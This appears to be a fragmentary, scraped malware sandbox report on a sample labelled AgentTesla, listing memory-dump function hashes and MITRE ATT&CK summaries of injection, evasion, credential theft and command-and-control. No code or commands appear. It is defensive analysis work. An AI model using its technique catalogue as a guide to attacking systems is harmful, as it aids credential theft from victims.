Source File: 00000016.00000002.736513878.0000000020EE0000.00000040.00000001.sdmp, Offset: 20EE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 326fb3c71a76b4192015d5849a488862829ecfcf68710a9876d176bfebbb287d
Instruction ID: 6e2db6fcacc66ae8535d1e976a18f80beb02268541f9d69fb36187b4fc718024
Opcode Fuzzy Hash: 326fb3c71a76b4192015d5849a488862829ecfcf68710a9876d176bfebbb287d
Instruction Fuzzy Hash: 1441E771E082588BCB19ABF9C0982ADBBF1AF88225F11043DD509E7395DF358C81CB92

Uniqueness

Uniqueness Score: -1.00%

Function 208D3207, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.736159388.00000000208D0000.00000040.00000001.sdmp, Offset: 208D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8931af35596870c18b1cef7f4c2bb9293ca98e46146a670096f2bcddafc72f3
Instruction ID: eceb09f3edf2d2b0f3f871a0c742cfa613057bf01f1542d6d55920a44278ab4f
Opcode Fuzzy Hash: e8931af35596870c18b1cef7f4c2bb9293ca98e46146a670096f2bcddafc72f3
Instruction Fuzzy Hash: F3315CB55093419FD301CF19D840A5BFFE4EF89620F04899EF888D7312D235DA18CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 208D2F8A, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.736159388.00000000208D0000.00000040.00000001.sdmp, Offset: 208D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2975c9636e6be9cc470286950a3f8f873527f782a6a43262b0e9a0e3c8cfd6
Instruction ID: 67c7ef37ffb5e308b4d8f7c7f5d3e688d9684f05141addbb29cf67abcace9e24
Opcode Fuzzy Hash: 2b2975c9636e6be9cc470286950a3f8f873527f782a6a43262b0e9a0e3c8cfd6
Instruction Fuzzy Hash: EF21E5B55083419FD340CF19D880A1BFBE4FF89660F04896EF998D7312E230E9048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 208D39FC, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.736159388.00000000208D0000.00000040.00000001.sdmp, Offset: 208D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e331cb03ff578f168acbb10d72eccb6cedad5feee109447c60511669f172cd38
Instruction ID: 5a50a2a7306a7916ae85a9bf07ef7d118e43759510885c9ff2120972fcf354d8
Opcode Fuzzy Hash: e331cb03ff578f168acbb10d72eccb6cedad5feee109447c60511669f172cd38
Instruction Fuzzy Hash: D011B7B5909301AFD340CF19D881A5BFBE4FB98660F14895EF998D7311E231EA148FA2

Uniqueness

Uniqueness Score: -1.00%

Function 1DF0075C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.734582641.000000001DF00000.00000040.00000040.sdmp, Offset: 1DF00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e244171f63ece663d5ac88b866724ff2efab375d1167b26b44943ab7a0b94519
Instruction ID: 55758118fbf65b2e4d2b5994f213bdb7529fe7dbecbe533da1e7196e8edb70c6
Opcode Fuzzy Hash: e244171f63ece663d5ac88b866724ff2efab375d1167b26b44943ab7a0b94519
Instruction Fuzzy Hash: 6B11B735204684DFD305CB18D980B26BBE6AB48B08F24C59DE9491B653C77BD903DE52

Uniqueness

Uniqueness Score: -1.00%

Function 1DF00724, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.734582641.000000001DF00000.00000040.00000040.sdmp, Offset: 1DF00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b16766c1c238786b762569e2be379f7b40e5ed5f6dadf36e9e4093bed50ac01
Instruction ID: c95baf9eb3f6d120b1dc409f23e4d9b5c509a3fe6ee236e035ce9dbc7a4a37b2
Opcode Fuzzy Hash: 0b16766c1c238786b762569e2be379f7b40e5ed5f6dadf36e9e4093bed50ac01
Instruction Fuzzy Hash: F92190351093C09FC307CB24D990B15BFB2AB5A714F1986DED4889B6A3C33A890ADB52

Uniqueness

Uniqueness Score: -1.00%

Function 1DF00700, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.734582641.000000001DF00000.00000040.00000040.sdmp, Offset: 1DF00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58a537b3c4af85b4897f3963f863f0239b27820953d56b82e0c9768bef9dca55
Instruction ID: e2ee34e3e13fe0bb61e86b930e3ea6c2cba3cfd38996795e77b2cf7f57a0f428
Opcode Fuzzy Hash: 58a537b3c4af85b4897f3963f863f0239b27820953d56b82e0c9768bef9dca55
Instruction Fuzzy Hash: C221A43510D3C18FC707CB24D894B25BFB2AB46304F1986EED4884B6A3C33E9906DB52

Uniqueness

Uniqueness Score: -1.00%

Function 208D38A0, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.736159388.00000000208D0000.00000040.00000001.sdmp, Offset: 208D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2616136abc736e7a57ef8c2582352648c2748f088a67c7ac6a6f353146766cd
Instruction ID: 3df35ff89323874dfe37120d5b7d59f2c9711f1040924c7862ede007f3f513f1
Opcode Fuzzy Hash: a2616136abc736e7a57ef8c2582352648c2748f088a67c7ac6a6f353146766cd
Instruction Fuzzy Hash: 1F11BAB5509301AFD750CF49DC81A5BFBE4EB88660F14891EF99897311E371E9148FA2

Uniqueness

Uniqueness Score: -1.00%

Function 1DF005CF, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.734582641.000000001DF00000.00000040.00000040.sdmp, Offset: 1DF00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fbb44d8410e12d94ef8e31b7b3bd893c4f014614c188930948f7b731409bcd7
Instruction ID: fb9784a6bf72f0bf751c2d25101399ac548b3bc5ee056c83f3a7802caa1a930a
Opcode Fuzzy Hash: 4fbb44d8410e12d94ef8e31b7b3bd893c4f014614c188930948f7b731409bcd7
Instruction Fuzzy Hash: 7F01DBB150D3845FD7128B05AC40863FFA8DE46620709C49FED498B612D225A908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 20EE386E, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.736513878.0000000020EE0000.00000040.00000001.sdmp, Offset: 20EE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8faf8ded3127172fe174e775ef4cc8646a4ed02dfb800305e4b987def827e547
Instruction ID: 75404c30fbc8e1af760dfee6b26b0a13b286b55e54f8aecd84c536895da3240f
Opcode Fuzzy Hash: 8faf8ded3127172fe174e775ef4cc8646a4ed02dfb800305e4b987def827e547
Instruction Fuzzy Hash: 47F0F632F0892C8BC7047FBCE4D926CBBF1BB84225B114879E94AA3345DF351E249782

Uniqueness

Uniqueness Score: -1.00%

Function 1DF00818, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.734582641.000000001DF00000.00000040.00000040.sdmp, Offset: 1DF00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 276b05ab4ef2e70b77221c1e7c6ed7aa5f0f4c5e6f02b74704c71aaab7293685
Instruction ID: 4fe66c23f922c1363467b8c9d0d5f429481e5eceaf22fe9a5915a9c27e90306c
Opcode Fuzzy Hash: 276b05ab4ef2e70b77221c1e7c6ed7aa5f0f4c5e6f02b74704c71aaab7293685
Instruction Fuzzy Hash: 4AF0FB35108685DFC306CB44D940B15FBA2FB89718F24C6A9E9480B652C33B9913DE81

Uniqueness

Uniqueness Score: -1.00%

Function 1DF005F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.734582641.000000001DF00000.00000040.00000040.sdmp, Offset: 1DF00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba186f589285df819ac287d8a95ad1d42a240ac3ad136987f2f7323a4e6fa92d
Instruction ID: b65aa4c43df9f0be69a6f0f122aa04c29ecd7942e4cd4831b2199099ca5ac4ea
Opcode Fuzzy Hash: ba186f589285df819ac287d8a95ad1d42a240ac3ad136987f2f7323a4e6fa92d
Instruction Fuzzy Hash: B0E092B66446048BD650CF0AFC41462FBD4EB84630B18C07FDD0D8B701E679F504CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 208D38EF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.736159388.00000000208D0000.00000040.00000001.sdmp, Offset: 208D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18117afd3b01f6666295c813cdd8b00502f9334895f0da2ef539147c48bd43fe
Instruction ID: b53bf56d164ba2e361b152dbd20e7e7fccd2bedacf63d9bbc9ad4e42b9d229f9
Opcode Fuzzy Hash: 18117afd3b01f6666295c813cdd8b00502f9334895f0da2ef539147c48bd43fe
Instruction Fuzzy Hash: 7EE0DFB29013046BD2508F0AAC86B63FB98EB40A30F18C05BEE081B303E272B5148AF5

Uniqueness

Uniqueness Score: -1.00%

Function 208D2FFF, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.736159388.00000000208D0000.00000040.00000001.sdmp, Offset: 208D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4821f91908df2c6039080d4b6db35d8174f62f7686839dd777d71ff8364e35d7
Instruction ID: 7d44d055f7fc4c61933d84ce48e036fc5d7cdd850872fead8d68cadc8c74b0f8
Opcode Fuzzy Hash: 4821f91908df2c6039080d4b6db35d8174f62f7686839dd777d71ff8364e35d7
Instruction Fuzzy Hash: 99E080B15453046BD2508F0AEC45F63FB98EB50670F18C557EE085F343E175B5148AF5

Uniqueness

Uniqueness Score: -1.00%

Function 208D3313, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.736159388.00000000208D0000.00000040.00000001.sdmp, Offset: 208D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7986592a6e77d9c6c81812f593a18c763da4f0de4d9f4bc432fabbdb1b77d1f
Instruction ID: 389f47cd3f51728eda4fee2ee7f70520b0d9100ea8f152dd0b55e1c48ba2b58f
Opcode Fuzzy Hash: b7986592a6e77d9c6c81812f593a18c763da4f0de4d9f4bc432fabbdb1b77d1f
Instruction Fuzzy Hash: BBE048B15452046BD2509F0AAC45B63FB98EB40670F18C557EE095B342E176B514CAF5

Uniqueness

Uniqueness Score: -1.00%

Function 208D3A67, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.736159388.00000000208D0000.00000040.00000001.sdmp, Offset: 208D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acc572f1c0ead08ec1a636c54fff7ee3991ff1b4dcbc5f6841cf41562550ad26
Instruction ID: 926e7fb4281332568e9ac5a65a1ed64c36d07558a8115aac3e0cb9c8aec365f9
Opcode Fuzzy Hash: acc572f1c0ead08ec1a636c54fff7ee3991ff1b4dcbc5f6841cf41562550ad26
Instruction Fuzzy Hash: 8EE0D8B15413046BD2508F0AAC45B63FB98EB50630F18C057ED081B342E171B5148AF5

Uniqueness

Uniqueness Score: -1.00%

Function 1DEC23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.734388699.000000001DEC2000.00000040.00000001.sdmp, Offset: 1DEC2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3819a0d99d621800024f843cb7603b76e600e6e708df5ad3eacb70a6aa34e60c
Instruction ID: e00ab0b8e3627966fdf9fc4f7cc0ccffd21da0a9fca2339c9fbfbb3401c8cfcb
Opcode Fuzzy Hash: 3819a0d99d621800024f843cb7603b76e600e6e708df5ad3eacb70a6aa34e60c
Instruction Fuzzy Hash: F4D05E7A604A818FD3128A1CC2A0BA53BA4AF52B09F4644FDB8008B763CB68D581E201

Uniqueness

Uniqueness Score: -1.00%

Function 1DEC23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.734388699.000000001DEC2000.00000040.00000001.sdmp, Offset: 1DEC2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9049c7bdeb71f33f5a21e5654000de84a83a50f75a04d5680245f5b44e32d3a1
Instruction ID: 1e7cfd8702d7bd015a9d038313540e10c6737222ee75d99f60b594285107c291
Opcode Fuzzy Hash: 9049c7bdeb71f33f5a21e5654000de84a83a50f75a04d5680245f5b44e32d3a1
Instruction Fuzzy Hash: B7D05E347002828BC702DB0CC6D0F6937D4AB40B15F0245E8AC058F362CBB8D8C1C600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01352B6F, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 958f248a02fd1ff68bd80047507e2f46583b2afc09f17d23fbceae88450dc91c
Instruction ID: 4ba958eb1f21955629432b9b8d972f87d39147d6346bb33ac7a31c2216c22b92
Opcode Fuzzy Hash: 958f248a02fd1ff68bd80047507e2f46583b2afc09f17d23fbceae88450dc91c
Instruction Fuzzy Hash: 9CE01A79351205DFC755DF18C6E4F5777E6EF59B04F968890ED018B621C734E880CA20

Uniqueness

Uniqueness Score: -1.00%

Function 0135187E, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0993497fc63e1a88ca5203d8a3b14c8f15a21915fb7f001a2a5a5452465fad5
Instruction ID: 1cdbc604c1366337b4e38856048defd44cbe6f4832ce6905dc51340df7477f5a
Opcode Fuzzy Hash: e0993497fc63e1a88ca5203d8a3b14c8f15a21915fb7f001a2a5a5452465fad5
Instruction Fuzzy Hash: E7C092B23815818FEF02DE18D4A1B8073B0FB15B84F8904D0E483CBA51C328FD00CA00

Uniqueness

Uniqueness Score: -1.00%

Function 01351A04, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01352943, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b97b493c5de5b60f5b4b38584462b048884b041f4193b8c62b4fbc039b38b1
Instruction ID: 3475905f218de1bce91885ea5b0b5db56346236df36878d1c41fae01823949c9
Opcode Fuzzy Hash: 30b97b493c5de5b60f5b4b38584462b048884b041f4193b8c62b4fbc039b38b1
Instruction Fuzzy Hash: 1AB092316A15408FCA41CA08C190E8073A1BB00A00B810480E00187A11C224E800CA00

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Dimmock5.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

SMTP Packets

Function 00407FA4, Relevance: 133.7, APIs: 57, Strings: 19, Instructions: 685
COMMON

Function 004091BF, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 128
COMMON

Function 0040AB34, Relevance: 16.6, APIs: 11, Instructions: 62
COMMON

Function 0040169C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 217
COMMON

Function 00409C6C, Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 202
COMMON

Function 00409A2B, Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 156
COMMON

Function 00408B48, Relevance: 45.7, APIs: 22, Strings: 4, Instructions: 196
COMMON

Function 004095F5, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 189
COMMON

Function 0040A7FE, Relevance: 33.3, APIs: 16, Strings: 3, Instructions: 94
COMMON

Function 00409FC5, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 79
COMMON

Function 0040AC45, Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 88
COMMON

Function 004093E0, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 123
COMMON

Function 0040A3D6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 104
COMMON

Function 004090CB, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 68
COMMON

Function 0040988F, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 67
COMMON

Function 0040A112, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 81
COMMON

Function 0040A683, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 95
COMMON

Function 0040A586, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 56
COMMON

Function 00408F02, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 118
COMMON

Function 00408E1B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55
COMMON

Function 0040A96A, Relevance: 13.6, APIs: 9, Instructions: 124
COMMON

Function 0040998C, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 39
COMMON

Function 0040A272, Relevance: 12.1, APIs: 8, Instructions: 85
COMMON

Function 0040AE2A, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30
COMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre